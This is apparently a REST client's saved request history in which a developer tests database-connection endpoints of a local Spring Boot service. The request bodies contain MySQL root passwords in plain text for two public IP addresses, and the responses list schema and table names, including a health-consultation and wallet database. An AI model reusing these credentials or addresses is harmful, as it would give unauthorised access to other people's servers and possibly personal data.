\\\"lzz@123\\\"\\n}\",\"responseBody\":\"error\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":19.0,\"minute\":28.0,\"second\":7.0,\"nano\":2.000408E8}}},{\"url\":\"http://localhost:8886/test-database-connection\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163/health?serverTimezone\\u003dUTC\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"ok\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":19.0,\"minute\":29.0,\"second\":0.0,\"nano\":4.296155E8}}},{\"url\":\"http://localhost:8886/test-database-connection\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://43.142.12.243/health?serverTimezone\\u003dUTC\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"error\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":19.0,\"minute\":33.0,\"second\":49.0,\"nano\":1.179387E8}}},{\"url\":\"http://localhost:8886/test-database-connection\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://43.142.12.243/etl?serverTimezone\\u003dUTC\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"error\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":19.0,\"minute\":34.0,\"second\":59.0,\"nano\":4.527054E8}}},{\"url\":\"http://localhost:8886/test-database-connection\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://43.142.12.243/etl?serverTimezone\\u003dUTC\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": \\\"ytt@123\\\"\\n}\",\"responseBody\":\"ok\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":19.0,\"minute\":35.0,\"second\":17.0,\"nano\":4.192197E8}}}],\"/findDatabaseTable\":[{\"url\":\"http://localhost:8886/findDatabaseTable\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://43.142.12.243\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": \\\"ytt@123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": [\\n \\\"information_schema\\\",\\n \\\"access\\\",\\n \\\"bbyb_examination\\\",\\n \\\"buy_car\\\",\\n \\\"demo-seata\\\",\\n \\\"ele-admin-api\\\",\\n \\\"etl\\\",\\n \\\"follow-up\\\",\\n \\\"goods\\\",\\n \\\"mall\\\",\\n \\\"mall-cloud\\\",\\n \\\"mall-config\\\",\\n \\\"mall-seata\\\",\\n \\\"mall_product\\\",\\n \\\"month6\\\",\\n \\\"mysql\\\",\\n \\\"performance_schema\\\",\\n \\\"plm_material\\\",\\n \\\"product\\\",\\n \\\"producth\\\",\\n \\\"rule\\\",\\n \\\"ry-cloud\\\",\\n \\\"ry-config\\\",\\n \\\"seata\\\",\\n \\\"sky_db\\\",\\n \\\"sys\\\",\\n \\\"xxl_job\\\",\\n \\\"yuekao\\\",\\n \\\"zhou1\\\",\\n \\\"zhou2\\\",\\n \\\"zhou3\\\"\\n ]\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":36.0,\"second\":48.0,\"nano\":5.312185E8}}},{\"url\":\"http://localhost:8886/findDatabaseTable\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\"\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/findDatabaseTable\\n\\n数据库密码不能为空, 驱动类不能为空, 数据库连接地址不能为空, 数据库用户名不能为空\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":56.0,\"second\":25.0,\"nano\":3.12132E7}}},{\"url\":\"http://localhost:8886/findDatabaseTable\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163:3306/\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": [\\n \\\"information_schema\\\",\\n \\\"etl\\\",\\n \\\"health\\\",\\n \\\"mall\\\",\\n \\\"mall-cloud\\\",\\n \\\"mall-product\\\",\\n \\\"mall-search\\\",\\n \\\"mall-seata\\\",\\n \\\"mysql\\\",\\n \\\"nacos_config\\\",\\n \\\"performance_schema\\\",\\n \\\"plm_material\\\",\\n \\\"product\\\",\\n \\\"ry-cloud\\\",\\n \\\"seata\\\",\\n \\\"skywalking\\\",\\n \\\"sys\\\",\\n \\\"xxl_job\\\",\\n \\\"yuekao\\\"\\n ]\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":57.0,\"second\":43.0,\"nano\":4.081869E8}}},{\"url\":\"http://localhost:8886/findDatabaseTable\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163:3306/health\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": [\\n \\\"information_schema\\\",\\n \\\"etl\\\",\\n \\\"health\\\",\\n \\\"mall\\\",\\n \\\"mall-cloud\\\",\\n \\\"mall-product\\\",\\n \\\"mall-search\\\",\\n \\\"mall-seata\\\",\\n \\\"mysql\\\",\\n \\\"nacos_config\\\",\\n \\\"performance_schema\\\",\\n \\\"plm_material\\\",\\n \\\"product\\\",\\n \\\"ry-cloud\\\",\\n \\\"seata\\\",\\n \\\"skywalking\\\",\\n \\\"sys\\\",\\n \\\"xxl_job\\\",\\n \\\"yuekao\\\"\\n ]\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":58.0,\"second\":20.0,\"nano\":6.477346E8}}},{\"url\":\"http://localhost:8886/findDatabaseTable\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163:3306\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": [\\n \\\"information_schema\\\",\\n \\\"etl\\\",\\n \\\"health\\\",\\n \\\"mall\\\",\\n \\\"mall-cloud\\\",\\n \\\"mall-product\\\",\\n \\\"mall-search\\\",\\n \\\"mall-seata\\\",\\n \\\"mysql\\\",\\n \\\"nacos_config\\\",\\n \\\"performance_schema\\\",\\n \\\"plm_material\\\",\\n \\\"product\\\",\\n \\\"ry-cloud\\\",\\n \\\"seata\\\",\\n \\\"skywalking\\\",\\n \\\"sys\\\",\\n \\\"xxl_job\\\",\\n \\\"yuekao\\\"\\n ]\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":58.0,\"second\":35.0,\"nano\":6.607178E8}}},{\"url\":\"http://localhost:8886/findDatabaseTable\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163:3306/\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": \\\"lzz@123\\\",\\n \\\"tableName\\\":\\\"health\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": [\\n \\\"ef_completed_questionnaire_answer\\\",\\n \\\"ef_followup_plan\\\",\\n \\\"ef_followup_plan_setting\\\",\\n \\\"ef_followup_task\\\",\\n \\\"ef_followup_task_item\\\",\\n \\\"ef_followup_task_item_setting\\\",\\n \\\"ef_followup_task_setting\\\",\\n \\\"ef_questionnaire\\\",\\n \\\"ef_questionnaire_option\\\",\\n \\\"ef_questionnaire_question\\\",\\n \\\"ef_questionnaire_section\\\",\\n \\\"ef_questionnaire_template\\\",\\n \\\"t_brank\\\",\\n \\\"t_community\\\",\\n \\\"t_community_explain\\\",\\n \\\"t_community_search\\\",\\n \\\"t_consult\\\",\\n \\\"t_consult_chat\\\",\\n \\\"t_department_disease\\\",\\n \\\"t_dictionary\\\",\\n \\\"t_disease\\\",\\n \\\"t_drug\\\",\\n \\\"t_drug_type\\\",\\n \\\"t_evaluate\\\",\\n \\\"t_explain_praise\\\",\\n \\\"t_file\\\",\\n \\\"t_file_sharding\\\",\\n \\\"t_gift\\\",\\n \\\"t_hb_log\\\",\\n \\\"t_historical_consultation\\\",\\n \\\"t_menu\\\",\\n \\\"t_orders\\\",\\n \\\"t_role\\\",\\n \\\"t_role_menu\\\",\\n \\\"t_system_news\\\",\\n \\\"t_user\\\",\\n \\\"t_user_auto_reply\\\",\\n \\\"t_user_collect\\\",\\n \\\"t_user_department\\\",\\n \\\"t_user_gift\\\",\\n \\\"t_user_hospital\\\",\\n \\\"t_user_job\\\",\\n \\\"t_user_role\\\",\\n \\\"t_video\\\",\\n \\\"t_video_comments\\\",\\n \\\"t_wallet_brank\\\",\\n \\\"t_wallet_info\\\",\\n \\\"t_withdraw_log\\\"\\n ]\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":21.0,\"minute\":34.0,\"second\":36.0,\"nano\":7.434797E8}}}],\"/test-database-mysql\":[{\"url\":\"http://localhost:8886/test-database-mysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 500,\\n \\\"msg\\\": \\\"操作异常\\\",\\n \\\"data\\\": null\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":39.0,\"second\":5.0,\"nano\":6.72859E7}}},{\"url\":\"http://localhost:8886/test-database-mysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 500,\\n \\\"msg\\\": \\\"操作异常\\\",\\n \\\"data\\\": null\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":43.0,\"second\":49.0,\"nano\":4.508657E8}}},{\"url\":\"http://localhost:8886/test-database-mysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 500,\\n \\\"msg\\\": \\\"操作异常\\\",\\n \\\"data\\\": null\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":44.0,\"second\":21.0,\"nano\":7.852463E8}}},{\"url\":\"http://localhost:8886/test-database-mysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\"\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/test-database-mysql\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eFri Jun 21 20:49:12 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":49.0,\"second\":12.0,\"nano\":8.879368E8}}},{\"url\":\"http://localhost:8886/test-database-mysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\"\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/test-database-mysql\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eFri Jun 21 20:49:28 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":49.0,\"second\":28.0,\"nano\":8.304501E8}}},{\"url\":\"http://localhost:8886/test-database-mysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\"\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/test-database-mysql\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eFri Jun 21 20:49:59 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":49.0,\"second\":59.0,\"nano\":9.699223E8}}},{\"url\":\"http://localhost:8886/test-database-mysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\"\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/test-database-mysql\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eFri Jun 21 20:53:52 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":53.0,\"second\":52.0,\"nano\":4.422725E8}}},{\"url\":\"http://localhost:8886/test-database-mysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\"\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/test-database-mysql\\n\\n驱动类不能为空, 数据库用户名不能为空, 数据库密码不能为空, 数据库连接地址不能为空\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":55.0,\"second\":0.0,\"nano\":4.917924E8}}},{\"url\":\"http://localhost:8886/test-database-mysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\"\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/test-database-mysql\\n\\n数据库密码不能为空, 数据库用户名不能为空, 数据库连接地址不能为空, 驱动类不能为空\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":56.0,\"second\":20.0,\"nano\":7.39437E7}}},{\"url\":\"http://localhost:8886/test-database-mysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163:3306/\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": null\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":57.0,\"second\":9.0,\"nano\":3.471744E8}}},{\"url\":\"http://localhost:8886/test-database-mysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163:3306/\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": \\\"lzz@123\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": null\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":20.0,\"minute\":57.0,\"second\":15.0,\"nano\":9.596244E8}}},{\"url\":\"http://localhost:8886/test-database-mysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"com.mysql.cj.jdbc.Driver\\\",\\n \\\"url\\\": \\\"jdbc:mysql://182.254.221.163:3306/\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"password\\\": \\\"lzz@123\\\",\\n \\\"tableName\\\":\\\"health\\\"\\n}\",\"responseBody\":\"{\\n \\\"code\\\": 200,\\n \\\"msg\\\": \\\"操作成功\\\",\\n \\\"data\\\": \\\"连接成功\\\"\\n}\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":21.0},\"time\":{\"hour\":21.0,\"minute\":34.0,\"second\":26.0,\"nano\":1.512348E8}}}],\"/testDatabaseMysql\":[{\"url\":\"http://localhost:8886/testDatabaseMysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\",\\n \\\"tableName\\\": \\\"\\\",\\n \\\"warehouseName\\\": \\\"\\\"\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/testDatabaseMysql\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eSat Jun 22 12:34:07 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":22.0},\"time\":{\"hour\":12.0,\"minute\":34.0,\"second\":7.0,\"nano\":9.278628E8}}},{\"url\":\"http://localhost:8886/testDatabaseMysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\",\\n \\\"tableName\\\": \\\"\\\",\\n \\\"warehouseName\\\": \\\"\\\"\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/testDatabaseMysql\\n\\n驱动类不能为空, 数据库连接地址不能为空, 数据库用户名不能为空, 数据库密码不能为空\",\"selectedItem\":\"POST\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":22.0},\"time\":{\"hour\":12.0,\"minute\":35.0,\"second\":17.0,\"nano\":7.667724E8}}},{\"url\":\"http://localhost:8886/testDatabaseMysql\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"{\\n \\\"driverClassName\\\": \\\"\\\",\\n \\\"url\\\": \\\"\\\",\\n \\\"username\\\": \\\"\\\",\\n \\\"password\\\": \\\"\\\",\\n \\\"tableName\\\": \\\"\\\",\\n \\\"warehouseName\\\": \\\"\\\"\\n}\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8886/testDatabaseMysql\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eSat Jun 22 12:39:36 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dInternal Server Error, 